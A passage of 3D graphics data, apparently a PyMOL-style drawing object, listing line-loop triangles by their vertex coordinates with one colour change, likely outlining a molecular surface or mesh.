VERTEX, 18.261, 28.495, 25.368,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.474, 28.334, 25.424,
VERTEX, 18.261, 28.495, 25.368,
VERTEX, 18.043, 28.000, 25.813,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.261, 28.495, 25.368,
VERTEX, 18.043, 28.000, 25.813,
VERTEX, 17.839, 28.166, 25.769,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.043, 28.000, 25.813,
VERTEX, 17.839, 28.166, 25.769,
VERTEX, 17.535, 27.677, 26.506,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.839, 28.166, 25.769,
VERTEX, 17.535, 27.677, 26.506,
VERTEX, 17.344, 27.851, 26.475,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.535, 27.677, 26.506,
VERTEX, 17.344, 27.851, 26.475,
VERTEX, 17.247, 27.552, 27.098,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.344, 27.851, 26.475,
VERTEX, 17.247, 27.552, 27.098,
VERTEX, 17.066, 27.735, 27.073,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.247, 27.552, 27.098,
VERTEX, 17.066, 27.735, 27.073,
VERTEX, 17.349, 27.700, 27.241,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.066, 27.735, 27.073,
VERTEX, 17.349, 27.700, 27.241,
VERTEX, 17.168, 27.887, 27.212,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.168, 27.887, 27.212,
VERTEX, 16.955, 28.096, 27.185,
VERTEX, 17.590, 28.216, 26.811,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.955, 28.096, 27.185,
VERTEX, 17.590, 28.216, 26.811,
VERTEX, 17.366, 28.422, 26.769,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.590, 28.216, 26.811,
VERTEX, 17.366, 28.422, 26.769,
VERTEX, 18.086, 28.531, 26.105,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.366, 28.422, 26.769,
VERTEX, 18.086, 28.531, 26.105,
VERTEX, 17.845, 28.727, 26.047,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.086, 28.531, 26.105,
VERTEX, 17.845, 28.727, 26.047,
VERTEX, 18.364, 28.647, 25.507,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.845, 28.727, 26.047,
VERTEX, 18.364, 28.647, 25.507,
VERTEX, 18.110, 28.832, 25.441,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.364, 28.647, 25.507,
VERTEX, 18.110, 28.832, 25.441,
VERTEX, 18.261, 28.495, 25.368,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.110, 28.832, 25.441,
VERTEX, 18.261, 28.495, 25.368,
VERTEX, 18.006, 28.677, 25.307,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.261, 28.495, 25.368,
VERTEX, 18.006, 28.677, 25.307,
VERTEX, 17.839, 28.166, 25.769,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.006, 28.677, 25.307,
VERTEX, 17.839, 28.166, 25.769,
VERTEX, 17.595, 28.352, 25.723,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.839, 28.166, 25.769,
VERTEX, 17.595, 28.352, 25.723,
VERTEX, 17.344, 27.851, 26.475,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.595, 28.352, 25.723,
VERTEX, 17.344, 27.851, 26.475,
VERTEX, 17.117, 28.047, 26.446,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.344, 27.851, 26.475,
VERTEX, 17.117, 28.047, 26.446,
VERTEX, 17.066, 27.735, 27.073,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.117, 28.047, 26.446,
VERTEX, 17.066, 27.735, 27.073,
VERTEX, 16.852, 27.941, 27.051,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.066, 27.735, 27.073,
VERTEX, 16.852, 27.941, 27.051,
VERTEX, 17.168, 27.887, 27.212,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.852, 27.941, 27.051,
VERTEX, 17.168, 27.887, 27.212,
VERTEX, 16.955, 28.096, 27.185,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.955, 28.096, 27.185,
VERTEX, 16.695, 28.344, 27.158,
VERTEX, 17.366, 28.422, 26.769,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.695, 28.344, 27.158,
VERTEX, 17.366, 28.422, 26.769,
VERTEX, 17.091, 28.664, 26.723,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.366, 28.422, 26.769,
VERTEX, 17.091, 28.664, 26.723,
VERTEX, 17.845, 28.727, 26.047,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.091, 28.664, 26.723,
VERTEX, 17.845, 28.727, 26.047,
VERTEX, 17.546, 28.957, 25.981,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.845, 28.727, 26.047,
VERTEX, 17.546, 28.957, 25.981,
VERTEX, 18.110, 28.832, 25.441,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.546, 28.957, 25.981,
VERTEX, 18.110, 28.832, 25.441,
VERTEX, 17.794, 29.051, 25.367,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.110, 28.832, 25.441,
VERTEX, 17.794, 29.051, 25.367,
VERTEX, 18.006, 28.677, 25.307,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.794, 29.051, 25.367,
VERTEX, 18.006, 28.677, 25.307,
VERTEX, 17.689, 28.892, 25.239,
END,
BEGIN, LINE_LOOP,
VERTEX, 18.006, 28.677, 25.307,
VERTEX, 17.689, 28.892, 25.239,
VERTEX, 17.595, 28.352, 25.723,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.689, 28.892, 25.239,
VERTEX, 17.595, 28.352, 25.723,
VERTEX, 17.292, 28.572, 25.674,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.595, 28.352, 25.723,
VERTEX, 17.292, 28.572, 25.674,
VERTEX, 17.117, 28.047, 26.446,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.292, 28.572, 25.674,
VERTEX, 17.117, 28.047, 26.446,
VERTEX, 16.837, 28.279, 26.416,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.117, 28.047, 26.446,
VERTEX, 16.837, 28.279, 26.416,
VERTEX, 16.852, 27.941, 27.051,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.837, 28.279, 26.416,
VERTEX, 16.852, 27.941, 27.051,
VERTEX, 16.590, 28.184, 27.030,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.852, 27.941, 27.051,
VERTEX, 16.590, 28.184, 27.030,
VERTEX, 16.955, 28.096, 27.185,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.590, 28.184, 27.030,
VERTEX, 16.955, 28.096, 27.185,
VERTEX, 16.695, 28.344, 27.158,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.695, 28.344, 27.158,
VERTEX, 16.372, 28.643, 27.129,
VERTEX, 17.091, 28.664, 26.723,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.372, 28.643, 27.129,
VERTEX, 17.091, 28.664, 26.723,
VERTEX, 16.749, 28.956, 26.672,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.091, 28.664, 26.723,
VERTEX, 16.749, 28.956, 26.672,
VERTEX, 17.546, 28.957, 25.981,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.749, 28.956, 26.672,
VERTEX, 17.546, 28.957, 25.981,
VERTEX, 17.173, 29.234, 25.906,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.546, 28.957, 25.981,
VERTEX, 17.173, 29.234, 25.906,
VERTEX, 17.794, 29.051, 25.367,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.173, 29.234, 25.906,
VERTEX, 17.794, 29.051, 25.367,
VERTEX, 17.396, 29.315, 25.280,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.794, 29.051, 25.367,
VERTEX, 17.396, 29.315, 25.280,
VERTEX, 17.689, 28.892, 25.239,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.396, 29.315, 25.280,
VERTEX, 17.689, 28.892, 25.239,
VERTEX, 17.288, 29.151, 25.161,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.689, 28.892, 25.239,
VERTEX, 17.288, 29.151, 25.161,
VERTEX, 17.292, 28.572, 25.674,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.288, 29.151, 25.161,
VERTEX, 17.292, 28.572, 25.674,
VERTEX, 16.911, 28.839, 25.618,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.292, 28.572, 25.674,
VERTEX, 16.911, 28.839, 25.618,
VERTEX, 16.837, 28.279, 26.416,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.911, 28.839, 25.618,
VERTEX, 16.837, 28.279, 26.416,
VERTEX, 16.487, 28.561, 26.384,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.837, 28.279, 26.416,
VERTEX, 16.487, 28.561, 26.384,
VERTEX, 16.590, 28.184, 27.030,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.487, 28.561, 26.384,
VERTEX, 16.590, 28.184, 27.030,
VERTEX, 16.264, 28.480, 27.010,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.590, 28.184, 27.030,
VERTEX, 16.264, 28.480, 27.010,
VERTEX, 16.695, 28.344, 27.158,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.264, 28.480, 27.010,
VERTEX, 16.695, 28.344, 27.158,
VERTEX, 16.372, 28.643, 27.129,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.372, 28.643, 27.129,
VERTEX, 16.053, 28.941, 27.101,
VERTEX, 16.749, 28.956, 26.672,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.053, 28.941, 27.101,
VERTEX, 16.749, 28.956, 26.672,
VERTEX, 16.408, 29.244, 26.621,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.749, 28.956, 26.672,
VERTEX, 16.408, 29.244, 26.621,
VERTEX, 17.173, 29.234, 25.906,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.408, 29.244, 26.621,
VERTEX, 17.173, 29.234, 25.906,
VERTEX, 16.799, 29.506, 25.832,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.173, 29.234, 25.906,
VERTEX, 16.799, 29.506, 25.832,
VERTEX, 17.396, 29.315, 25.280,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.799, 29.506, 25.832,
VERTEX, 17.396, 29.315, 25.280,
VERTEX, 16.996, 29.573, 25.196,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.396, 29.315, 25.280,
VERTEX, 16.996, 29.573, 25.196,
VERTEX, 17.288, 29.151, 25.161,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.996, 29.573, 25.196,
VERTEX, 17.288, 29.151, 25.161,
VERTEX, 16.884, 29.406, 25.085,
END,
BEGIN, LINE_LOOP,
VERTEX, 17.288, 29.151, 25.161,
VERTEX, 16.884, 29.406, 25.085,
VERTEX, 16.911, 28.839, 25.618,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.884, 29.406, 25.085,
VERTEX, 16.911, 28.839, 25.618,
VERTEX, 16.528, 29.103, 25.565,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.911, 28.839, 25.618,
VERTEX, 16.528, 29.103, 25.565,
VERTEX, 16.487, 28.561, 26.384,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.528, 29.103, 25.565,
VERTEX, 16.487, 28.561, 26.384,
VERTEX, 16.138, 28.841, 26.354,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.487, 28.561, 26.384,
VERTEX, 16.138, 28.841, 26.354,
VERTEX, 16.264, 28.480, 27.010,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.138, 28.841, 26.354,
VERTEX, 16.264, 28.480, 27.010,
VERTEX, 15.941, 28.774, 26.990,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.264, 28.480, 27.010,
VERTEX, 15.941, 28.774, 26.990,
VERTEX, 16.372, 28.643, 27.129,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.941, 28.774, 26.990,
VERTEX, 16.372, 28.643, 27.129,
VERTEX, 16.053, 28.941, 27.101,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.053, 28.941, 27.101,
VERTEX, 15.801, 29.181, 27.079,
VERTEX, 16.408, 29.244, 26.621,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.801, 29.181, 27.079,
VERTEX, 16.408, 29.244, 26.621,
VERTEX, 16.138, 29.476, 26.581,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.408, 29.244, 26.621,
VERTEX, 16.138, 29.476, 26.581,
VERTEX, 16.799, 29.506, 25.832,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.138, 29.476, 26.581,
VERTEX, 16.799, 29.506, 25.832,
VERTEX, 16.499, 29.723, 25.774,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.799, 29.506, 25.832,
VERTEX, 16.499, 29.723, 25.774,
VERTEX, 16.996, 29.573, 25.196,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.499, 29.723, 25.774,
VERTEX, 16.996, 29.573, 25.196,
VERTEX, 16.674, 29.777, 25.130,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.996, 29.573, 25.196,
VERTEX, 16.674, 29.777, 25.130,
VERTEX, 16.884, 29.406, 25.085,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.674, 29.777, 25.130,
VERTEX, 16.884, 29.406, 25.085,
VERTEX, 16.559, 29.607, 25.026,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.884, 29.406, 25.085,
VERTEX, 16.559, 29.607, 25.026,
VERTEX, 16.528, 29.103, 25.565,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.559, 29.607, 25.026,
VERTEX, 16.528, 29.103, 25.565,
VERTEX, 16.222, 29.313, 25.524,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.528, 29.103, 25.565,
VERTEX, 16.222, 29.313, 25.524,
VERTEX, 16.138, 28.841, 26.354,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.222, 29.313, 25.524,
VERTEX, 16.138, 28.841, 26.354,
VERTEX, 15.861, 29.066, 26.332,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.138, 28.841, 26.354,
VERTEX, 15.861, 29.066, 26.332,
VERTEX, 15.941, 28.774, 26.990,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.861, 29.066, 26.332,
VERTEX, 15.941, 28.774, 26.990,
VERTEX, 15.687, 29.011, 26.976,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.941, 28.774, 26.990,
VERTEX, 15.687, 29.011, 26.976,
VERTEX, 16.053, 28.941, 27.101,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.687, 29.011, 26.976,
VERTEX, 16.053, 28.941, 27.101,
VERTEX, 15.801, 29.181, 27.079,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.801, 29.181, 27.079,
VERTEX, 15.599, 29.375, 27.063,
VERTEX, 16.138, 29.476, 26.581,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.599, 29.375, 27.063,
VERTEX, 16.138, 29.476, 26.581,
VERTEX, 15.919, 29.663, 26.550,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.138, 29.476, 26.581,
VERTEX, 15.919, 29.663, 26.550,
VERTEX, 16.499, 29.723, 25.774,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.919, 29.663, 26.550,
VERTEX, 16.499, 29.723, 25.774,
VERTEX, 16.254, 29.896, 25.727,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.499, 29.723, 25.774,
VERTEX, 16.254, 29.896, 25.727,
VERTEX, 16.674, 29.777, 25.130,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.254, 29.896, 25.727,
VERTEX, 16.674, 29.777, 25.130,
VERTEX, 16.409, 29.939, 25.077,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.674, 29.777, 25.130,
VERTEX, 16.409, 29.939, 25.077,
VERTEX, 16.559, 29.607, 25.026,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.409, 29.939, 25.077,
VERTEX, 16.559, 29.607, 25.026,
VERTEX, 16.293, 29.766, 24.981,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.559, 29.607, 25.026,
VERTEX, 16.293, 29.766, 24.981,
VERTEX, 16.222, 29.313, 25.524,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.293, 29.766, 24.981,
VERTEX, 16.222, 29.313, 25.524,
VERTEX, 15.974, 29.478, 25.494,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.222, 29.313, 25.524,
VERTEX, 15.974, 29.478, 25.494,
VERTEX, 15.861, 29.066, 26.332,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.974, 29.478, 25.494,
VERTEX, 15.861, 29.066, 26.332,
VERTEX, 15.638, 29.245, 26.317,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.861, 29.066, 26.332,
VERTEX, 15.638, 29.245, 26.317,
VERTEX, 15.687, 29.011, 26.976,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.638, 29.245, 26.317,
VERTEX, 15.687, 29.011, 26.976,
VERTEX, 15.483, 29.202, 26.967,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.687, 29.011, 26.976,
VERTEX, 15.483, 29.202, 26.967,
VERTEX, 15.801, 29.181, 27.079,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.483, 29.202, 26.967,
VERTEX, 15.801, 29.181, 27.079,
VERTEX, 15.599, 29.375, 27.063,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.599, 29.375, 27.063,
VERTEX, 15.430, 29.536, 27.053,
VERTEX, 15.919, 29.663, 26.550,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.430, 29.536, 27.053,
VERTEX, 15.919, 29.663, 26.550,
VERTEX, 15.731, 29.817, 26.526,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.919, 29.663, 26.550,
VERTEX, 15.731, 29.817, 26.526,
VERTEX, 16.254, 29.896, 25.727,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.731, 29.817, 26.526,
VERTEX, 16.254, 29.896, 25.727,
VERTEX, 16.042, 30.039, 25.690,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.254, 29.896, 25.727,
VERTEX, 16.042, 30.039, 25.690,
VERTEX, 16.409, 29.939, 25.077,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.042, 30.039, 25.690,
VERTEX, 16.409, 29.939, 25.077,
VERTEX, 16.181, 30.070, 25.036,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.409, 29.939, 25.077,
VERTEX, 16.181, 30.070, 25.036,
VERTEX, 16.293, 29.766, 24.981,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.181, 30.070, 25.036,
VERTEX, 16.293, 29.766, 24.981,
VERTEX, 16.066, 29.893, 24.946,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.293, 29.766, 24.981,
VERTEX, 16.066, 29.893, 24.946,
VERTEX, 15.974, 29.478, 25.494,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.066, 29.893, 24.946,
VERTEX, 15.974, 29.478, 25.494,
VERTEX, 15.764, 29.611, 25.473,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.974, 29.478, 25.494,
VERTEX, 15.764, 29.611, 25.473,
VERTEX, 15.638, 29.245, 26.317,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.764, 29.611, 25.473,
VERTEX, 15.638, 29.245, 26.317,
VERTEX, 15.453, 29.390, 26.309,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.638, 29.245, 26.317,
VERTEX, 15.453, 29.390, 26.309,
VERTEX, 15.483, 29.202, 26.967,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.453, 29.390, 26.309,
VERTEX, 15.483, 29.202, 26.967,
VERTEX, 15.315, 29.359, 26.963,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.483, 29.202, 26.967,
VERTEX, 15.315, 29.359, 26.963,
VERTEX, 15.599, 29.375, 27.063,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.315, 29.359, 26.963,
VERTEX, 15.599, 29.375, 27.063,
VERTEX, 15.430, 29.536, 27.053,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.430, 29.536, 27.053,
VERTEX, 15.277, 29.674, 27.048,
VERTEX, 15.731, 29.817, 26.526,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.277, 29.674, 27.048,
VERTEX, 15.731, 29.817, 26.526,
VERTEX, 15.559, 29.952, 26.508,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.731, 29.817, 26.526,
VERTEX, 15.559, 29.952, 26.508,
VERTEX, 16.042, 30.039, 25.690,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.559, 29.952, 26.508,
VERTEX, 16.042, 30.039, 25.690,
VERTEX, 15.846, 30.162, 25.661,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.042, 30.039, 25.690,
VERTEX, 15.846, 30.162, 25.661,
VERTEX, 16.181, 30.070, 25.036,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.846, 30.162, 25.661,
VERTEX, 16.181, 30.070, 25.036,
VERTEX, 15.969, 30.182, 25.004,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.181, 30.070, 25.036,
VERTEX, 15.969, 30.182, 25.004,
VERTEX, 16.066, 29.893, 24.946,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.969, 30.182, 25.004,
VERTEX, 16.066, 29.893, 24.946,
VERTEX, 15.856, 30.000, 24.920,
END,
BEGIN, LINE_LOOP,
VERTEX, 16.066, 29.893, 24.946,
VERTEX, 15.856, 30.000, 24.920,
VERTEX, 15.764, 29.611, 25.473,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.856, 30.000, 24.920,
VERTEX, 15.764, 29.611, 25.473,
VERTEX, 15.574, 29.723, 25.460,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.764, 29.611, 25.473,
VERTEX, 15.574, 29.723, 25.460,
VERTEX, 15.453, 29.390, 26.309,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.574, 29.723, 25.460,
VERTEX, 15.453, 29.390, 26.309,
VERTEX, 15.287, 29.512, 26.307,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.453, 29.390, 26.309,
VERTEX, 15.287, 29.512, 26.307,
VERTEX, 15.315, 29.359, 26.963,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.287, 29.512, 26.307,
VERTEX, 15.315, 29.359, 26.963,
VERTEX, 15.164, 29.492, 26.965,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.315, 29.359, 26.963,
VERTEX, 15.164, 29.492, 26.965,
VERTEX, 15.430, 29.536, 27.053,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.164, 29.492, 26.965,
VERTEX, 15.430, 29.536, 27.053,
VERTEX, 15.277, 29.674, 27.048,
END,
COLOR, 0.000, 0.808, 1.000,
BEGIN, LINE_LOOP,
VERTEX, 15.277, 29.674, 27.048,
VERTEX, 14.967, 29.680, 27.566,
VERTEX, 15.559, 29.952, 26.508,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.967, 29.680, 27.566,
VERTEX, 15.559, 29.952, 26.508,
VERTEX, 15.320, 30.026, 26.710,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.559, 29.952, 26.508,
VERTEX, 15.320, 30.026, 26.710,
VERTEX, 15.846, 30.162, 25.661,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.320, 30.026, 26.710,
VERTEX, 15.846, 30.162, 25.661,
VERTEX, 15.710, 30.328, 25.424,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.846, 30.162, 25.661,
VERTEX, 15.710, 30.328, 25.424,
VERTEX, 15.969, 30.182, 25.004,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.710, 30.328, 25.424,
VERTEX, 15.969, 30.182, 25.004,
VERTEX, 15.909, 30.408, 24.460,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.969, 30.182, 25.004,
VERTEX, 15.909, 30.408, 24.460,
VERTEX, 15.856, 30.000, 24.920,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.909, 30.408, 24.460,
VERTEX, 15.856, 30.000, 24.920,
VERTEX, 15.800, 30.221, 24.383,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.856, 30.000, 24.920,
VERTEX, 15.800, 30.221, 24.383,
VERTEX, 15.574, 29.723, 25.460,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.800, 30.221, 24.383,
VERTEX, 15.574, 29.723, 25.460,
VERTEX, 15.448, 29.876, 25.238,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.574, 29.723, 25.460,
VERTEX, 15.448, 29.876, 25.238,
VERTEX, 15.287, 29.512, 26.307,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.448, 29.876, 25.238,
VERTEX, 15.287, 29.512, 26.307,
VERTEX, 15.058, 29.574, 26.525,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.287, 29.512, 26.307,
VERTEX, 15.058, 29.574, 26.525,
VERTEX, 15.164, 29.492, 26.965,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.058, 29.574, 26.525,
VERTEX, 15.164, 29.492, 26.965,
VERTEX, 14.859, 29.493, 27.489,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.164, 29.492, 26.965,
VERTEX, 14.859, 29.493, 27.489,
VERTEX, 15.277, 29.674, 27.048,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.859, 29.493, 27.489,
VERTEX, 15.277, 29.674, 27.048,
VERTEX, 14.967, 29.680, 27.566,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.967, 29.680, 27.566,
VERTEX, 14.866, 29.854, 27.395,
VERTEX, 15.320, 30.026, 26.710,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.866, 29.854, 27.395,
VERTEX, 15.320, 30.026, 26.710,
VERTEX, 15.155, 30.170, 26.630,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.320, 30.026, 26.710,
VERTEX, 15.155, 30.170, 26.630,
VERTEX, 15.710, 30.328, 25.424,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.155, 30.170, 26.630,
VERTEX, 15.710, 30.328, 25.424,
VERTEX, 15.459, 30.426, 25.478,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.710, 30.328, 25.424,
VERTEX, 15.459, 30.426, 25.478,
VERTEX, 15.909, 30.408, 24.460,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.459, 30.426, 25.478,
VERTEX, 15.909, 30.408, 24.460,
VERTEX, 15.600, 30.471, 24.613,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.909, 30.408, 24.460,
VERTEX, 15.600, 30.471, 24.613,
VERTEX, 15.800, 30.221, 24.383,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.600, 30.471, 24.613,
VERTEX, 15.800, 30.221, 24.383,
VERTEX, 15.495, 30.279, 24.543,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.800, 30.221, 24.383,
VERTEX, 15.495, 30.279, 24.543,
VERTEX, 15.448, 29.876, 25.238,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.495, 30.279, 24.543,
VERTEX, 15.448, 29.876, 25.238,
VERTEX, 15.206, 29.963, 25.308,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.448, 29.876, 25.238,
VERTEX, 15.206, 29.963, 25.308,
VERTEX, 15.058, 29.574, 26.525,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.206, 29.963, 25.308,
VERTEX, 15.058, 29.574, 26.525,
VERTEX, 14.902, 29.707, 26.460,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.058, 29.574, 26.525,
VERTEX, 14.902, 29.707, 26.460,
VERTEX, 14.859, 29.493, 27.489,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.902, 29.707, 26.460,
VERTEX, 14.859, 29.493, 27.489,
VERTEX, 14.762, 29.662, 27.325,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.859, 29.493, 27.489,
VERTEX, 14.762, 29.662, 27.325,
VERTEX, 14.967, 29.680, 27.566,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.762, 29.662, 27.325,
VERTEX, 14.967, 29.680, 27.566,
VERTEX, 14.866, 29.854, 27.395,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.866, 29.854, 27.395,
VERTEX, 14.731, 30.044, 27.191,
VERTEX, 15.155, 30.170, 26.630,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.731, 30.044, 27.191,
VERTEX, 15.155, 30.170, 26.630,
VERTEX, 14.955, 30.329, 26.537,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.155, 30.170, 26.630,
VERTEX, 14.955, 30.329, 26.537,
VERTEX, 15.459, 30.426, 25.478,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.955, 30.329, 26.537,
VERTEX, 15.459, 30.426, 25.478,
VERTEX, 15.170, 30.536, 25.549,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.459, 30.426, 25.478,
VERTEX, 15.170, 30.536, 25.549,
VERTEX, 15.600, 30.471, 24.613,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.170, 30.536, 25.549,
VERTEX, 15.600, 30.471, 24.613,
VERTEX, 15.249, 30.545, 24.805,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.600, 30.471, 24.613,
VERTEX, 15.249, 30.545, 24.805,
VERTEX, 15.495, 30.279, 24.543,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.249, 30.545, 24.805,
VERTEX, 15.495, 30.279, 24.543,
